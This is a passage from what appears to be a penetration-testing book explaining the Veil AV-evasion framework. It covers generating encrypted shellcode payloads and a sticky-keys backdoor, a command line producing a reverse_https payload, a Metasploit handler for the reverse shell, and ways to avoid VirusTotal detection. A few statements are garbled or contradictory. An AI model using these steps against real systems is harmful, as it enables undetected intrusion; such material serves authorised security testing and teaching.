Using the Veil framework

The Veil framework is another AV-Evasion framework, written by Chris Truncer, called Veil-Evasion (www.veil-framework.com), which provides effective protection against, and detection of, any standalone exploits for the endpoints and servers. The latest version of the Veil framework, as of December 2018, is 3.1.11. The framework consists of two tools: Evasion and Ordnance.

Evasion aggregates various techniques into a framework that simplifies management, and Ordnance generates the shellcode for supported payloads to further create new exploits for known vulnerabilities.

As a framework, Veil possesses several features, which include the following:

  • It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python.
  • It can use Metasploit-generated shellcode, or you can create your own using Ordnance.
  • It can integrate third-party tools such as Hyperion (which encrypts an EXE file with AES 128-bit encryption), PEScrambler, and BackDoor Factory.
  • Payloads can be generated and seamlessly substituted into all PsExec, Python, and .exe calls.
  • Users have the ability to reuse shellcode or implement their own encryption methods.
  • Its functionality can be scripted to automate deployment.
  • Veil is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system).

Veil can generate an exploit payload; the standalone payloads include the following options:

  • Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7Zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect any unusual activity.
  • The Sethc backdoor configures the victim's registry to launch the RDP sticky keys backdoor.
  • A PowerShell shellcode injector.

When the payloads have been created, they can be delivered to the target in one of the following two ways:

  • Upload and execute using Impacket and the PTH toolkit
  • UNC invocation

The Veil framework is available from Kali repositories and it is automatically installed by simply entering apt-get install veil in the Terminal.

If you receive any errors during installation, rerun /usr/share/veil/config/setup.sh --force --silent.

Veil presents the user with the Main Menu, which provides two tools to select and a number of payload modules that are loaded, as well as the available commands. Typing use Evasion will take us to the Evasion tool and the list command that will list all the available payloads. The Veil framework's initial launch screen is shown in the following screenshot:

The Veil framework is undergoing rapid development, with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 41 payloads designed to bypass antivirus, by employing encryption or direct injection into the memory space, in the Evasion tool. These payloads are shown in the following screenshot:

To obtain information on a specific payload, type info <payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 29 to select the python/shellcode_inject/aes_encrypt payload by running use 29:

The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable and it also includes CLICKTRACK, which sets the value of how many clicks the user has to make to execute the payload. This function contributes to the stealthiness of the attack.

Some of the required options are pre-filled with default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the Command Prompt.

If the payload uses shellcode, you will be presented with the shellcode menu, where you can select from the options listed in the following screenshot:

Ordnance is, by default, where you will be able to generate specific shellcode; if there is an error, it will default to msfvenom or custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of x01x02, without quotes and newlines ( ). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press the Tab key to complete the available payloads. The available payloads are shown in the following screenshot:

In the following screenshot, the tab command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_https) was selected:

The user will then be presented with the output menu, with a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, the user will have the option of either using Pyinstaller to create the EXE file, or using Py2Exe. Once the generation of the EXE is complete, you should be able to see the following:

The exploit could also have been created directly from the command line by using the following options:

kali@linux:~./ t Evasion -p 29 --ordnance-payload rev_https --ip 192.168.1.7 --port 443 -o Outfile

Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and its behavior flags it as malicious software, then a signature update against the submission can be released by antivirus vendors in as little as one hour. This is why users are clearly admonished with the don't submit samples to any online scanner! message.

Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows:

Testing thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use with the Metasploit framework, use exploit/multi/handler and set PAYLOAD to be windows/meterpreter/reverse_https (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used for Veil-Evasion as well. When the listener is functional, send the exploit to the target system. When the listeners launch it, it will establish a reverse shell back to the attacker's system.

 

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
52.90.121.17